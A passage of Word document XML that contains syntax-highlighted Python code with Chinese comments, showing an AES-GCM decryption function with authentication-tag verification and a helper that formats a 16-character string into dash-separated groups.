          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cipherBytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>iv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bytes</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    cipher = AES.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, AES.MODE_GCM, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>iv</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    auth_tag_length = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">16  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>这个长度根据加密算法和模式来确定，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AES-GCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通常为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>字节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">auth_tag = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cipherBytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[-auth_tag_length:]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    ciphertext = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cipherBytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[:-auth_tag_length]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>解密并验证认证标签</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>try</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># plain_text = cipher.decrypt(ciphertext)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>plain_text = cipher.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>decrypt_and_verify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(ciphertext, auth_tag)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>plain_text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">except </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ValueError</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56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"Decryption failed: Invalid authentication tag"</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>return None</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>format_string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>input_string</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>确保输入的字符串长度为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>input_string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>16</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"Invalid input length"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>使用切片将字符串分割成四部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>parts = [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>input_string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[i:i+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>input_string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>使用字符串连接操作将切片后的部分用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> "-" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">formatted_string = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
